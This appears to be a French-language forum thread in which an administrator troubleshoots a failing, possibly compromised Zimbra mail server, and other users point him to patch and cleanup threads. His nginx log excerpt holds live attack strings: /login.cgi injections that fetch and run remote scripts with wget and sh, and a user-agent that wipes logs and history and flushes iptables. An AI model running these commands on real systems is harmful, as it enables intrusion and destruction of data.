4 réponses à ce sujet

[Hargan]

Bonjour,

J’ai eu divers problème sur un serveur Zimbra :
Release 8.7.11.GA.1854.UBUNTU14.64 UBUNTU14_64 FOSS edition
Il s’agit d’un serveur standalone.

Depuis hier, différents services semblent s’arrêter de manière impromptu :
memcached, opendkim et stats, puis après quelques minutes ou heures, en viens snmp à son tour.

A partir de la, les mails envoyé depuis le serveur sont mis en file d’attente et ne vont nul part.

Avant cela, tous tournais très bien depuis pas mal de temps (à compter en années).

Après avoir, lu pas mal de sujet sur memcached, je me suis rendu compte qu’il n’était pas obligatoire sur un serveur standalone. J’ai donc décidé de le configurer sans proxy. Il semblerai que je n’ai pas réussi et ai eu du mal aussi à le réactiver et remettre à la configuration initial.

Dorénavant, le webmail n’est plus accessible et me renvois une page blanche. Par contre, aucun souci pour l’interface d’admin web.
Cependant cette dernière ne m’affiche pas les mêmes résultats que la commande zmcontrol status … Qui dernièrement m’envois :

amavis Running
antispam Running
antivirus Running
ldap Running
logger Running
mailbox Running
memcached Running
mta Running
opendkim Running
proxy Running
service webapp Running
snmp Running
spell Running
stats Running
zimbra webapp Running
zimbraAdmin webapp Running
zimlet webapp Running
zmconfigd Running

Je commence à m’y perdre les pédales et ne plus rien y comprendre.

Je n’ai pas trouver grand choses dans la plus part des logs à part un problème concernant

[i]Jul 5 06:52:54 zimbra postfix/dkimmilter/smtpd[4666]: warning: connect to Milter service inet:localhost:8465: Connection refused[/i]
[i]Jul 5 06:52:54 zimbra postfix/dkimmilter/smtpd[4666]: NOQUEUE: milter-reject: CONNECT from localhost[127.0.0.1]: 451 4.7.1 Service unavailable - try again later; proto=SMTP[/i]
[i]Jul 5 06:52:54 zimbra postfix/dkimmilter/smtpd[4666]: NOQUEUE: milter-reject: EHLO from localhost[127.0.0.1]: 451 4.7.1 Service unavailable - try again later; proto=SMTP helo=<localhost>[/i]
[i]Jul 5 06:52:54 zimbra postfix/dkimmilter/smtpd[4667]: connect from localhost[127.0.0.1][/i]

Est-ce que quelqu’un peux me donner une piste à fouiller ?

Merci beaucoup !!

EDIT : Le serveur vient de m'envoyer un mail, disant que snmp s'est arrêter, et je confirme qu'en faisait zmcontrol status, snmp est toujours en Running

[Zimbra Guy]

You have been compromised ?
Votre serveur a quel niveau de patch ? Vous êtes peut-être victime de la faille suivante :
https://forums.zimbr...e0bb12d88a8cff8
Lisez attentivement les informations qui y sont livrées et si c'est bien ça, fermez vos accès à la mesasgerie,
faites le nettoyage, et patchez.

A+

[Hargan]

Bonjour et merci pour ta réponse,

Ta réponse m'a donné quelques pistes. J'ai trouvé ça dans les log nginx.access.log

151.62.33.139:46202 - - [05/Jul/2019:16:06:30 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://206.189.170.165/d%20-O%20-%3E%20/tmp/ff;chmod%20+x%20/tmp/ff;sh%20/tmp/ff%27$ HTTP/1.1" 400 311 "-" "ELEMENT/2.0" "-"
79.24.13.110:35483 - - [05/Jul/2019:16:13:55 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://206.189.170.165/d%20-O%20-%3E%20/tmp/ff;chmod%20+x%20/tmp/ff;sh%20/tmp/ff%27$ HTTP/1.1" 400 311 "-" "ELEMENT/2.0" "-"
89.248.172.90:35910 - - [05/Jul/2019:16:48:05 +0200] "GET http://httpheader.net/ HTTP/1.1" 302 345 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.28) Gecko/20120306 Firefox/3.6.28 (.NET CLR 3.5.30729)" "-"
89.248.172.90:37980 - - [05/Jul/2019:16:48:07 +0200] "CONNECT httpheader.net:443 HTTP/1.1" 400 311 "-" "-" "-"
89.248.172.90:40392 - - [05/Jul/2019:16:48:08 +0200] "\x04\x01\x00P\xC0c\xF660\x00" 400 311 "-" "-" "-"
89.248.172.90:40418 - - [05/Jul/2019:16:48:08 +0200] "\x04\x01\x00P\xC0c\xF660\x00" 400 311 "-" "-" "-"
89.248.172.90:40430 - - [05/Jul/2019:16:48:08 +0200] "\x05\x01\x00" 400 311 "-" "-" "-"
89.175.139.132:32870 - - [05/Jul/2019:16:56:35 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://104.248.93.159/sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 400 311 "-" "Hakai/2.0" "-"
43.225.126.159:56477 - - [05/Jul/2019:17:12:09 +0200] "POST /public/Ajax.jsp HTTP/1.1" 404 1847 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:63.0) Gecko/20100101 Firefox/63.0" "127.0.1.1:8443"
92.154.110.87:58735 - - [05/Jul/2019:17:23:34 +0200] "\x16\x03\x00\x00i\x01\x00\x00e\x03\x03U\x1C\xA7\xE4random1random2random3random4\x00\x00\x0C\x00/\x00" 400 311 "-" "-" "-"
92.154.110.87:50464 - - [05/Jul/2019:17:23:35 +0200] "GET / HTTP/1.1" 302 339 "-" "Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)" "-"
209.17.96.10:36118 - - [05/Jul/2019:17:23:41 +0200] "GET / HTTP/1.1" 200 396 "-" "Mozilla/5.0 (compatible; Nimbostratus-Bot/v1.3.2; http://cloudsystemnetworks.com)" "127.0.1.1:8443"
92.154.110.87:57218 - - [05/Jul/2019:17:24:28 +0200] "GET / HTTP/1.1" 200 391 "-" "Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)" "127.0.1.1:8443"
114.35.176.7:46789 - - [05/Jul/2019:17:24:30 +0200] "GET /Login.htm HTTP/1.1" 400 311 "-" "-" "-"
193.112.19.164:36566 - - [05/Jul/2019:17:38:30 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://68.183.39.48/sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 400 311 "-" "Hakai/2.0" "-"
143.255.242.201:58164 - - [05/Jul/2019:18:58:04 +0200] "GET / HTTP/1.1" 302 344 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" "-"
106.12.215.87:40696 - - [05/Jul/2019:19:21:35 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://80.211.203.234/bin%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$ HTTP/1.1" 400 311 "-" "Hakai/2.0;rm -rf /tmp/* /var/* /var/run/* /var/tmp/*;rm -rf /var/log/wtmp;rm -rf ~/.bash_history;history -c;history -w;rm -rf /tmp/*;history -c;rm -rf /bin/netstat;history -w;pkill -9 busybox;pkill -9 perl;service iptables stop;/sbin/iptables -F;/sbin/iptables -X;service firewalld stop;" "-"

Mais vu que la webapp ne fonctionne plus, je ne suis pas sur que cela est eu un effet.
Mais je vois aussi que la tentative de manipulation essai d'effacer toutes traces de passage. Je vois aussi qu'il essai de stoper iptables, ce qui n'est pas le cas, ce dernier fonctionne très bien avec toutes mes règles.

Je ne sais toujours pas comment faire refonctionner la webapp de zimbra, mais surtout est ce que je ne me mettrais pas en danger vu le type d'attaque.
Est ce que tu pense toujours que celle-ci est lié à celle que tu à mentionner ?

Comment est ce que je peux te donner mon niveau de patch si ce que j'avais mentionner dans mon premier message ne suffit pas ? (Release 8.7.11.GA.1854.UBUNTU14.64 UBUNTU14_64 FOSS edition)

[Klug]

Il y a sur ce forum (et le forum US) plusieurs threads très clairs/explicatifs sur ce problème (XXE and co, patches à passer, comment nettoyer son serveur une fois qu'il a été compromis).
Un lien ici : https://www.zimbrafr...-important-xxe/

[Zimbra Guy]

Quote

Comment est ce que je peux te donner mon niveau de patch si ce que j'avais mentionner dans mon premier message ne suffit pas ? (Release 8.7.11.GA.1854.UBUNTU14.64 UBUNTU14_64 FOSS edition)

zmcontrol -v ? Ou avoir connaissance de l'historique du serveur ?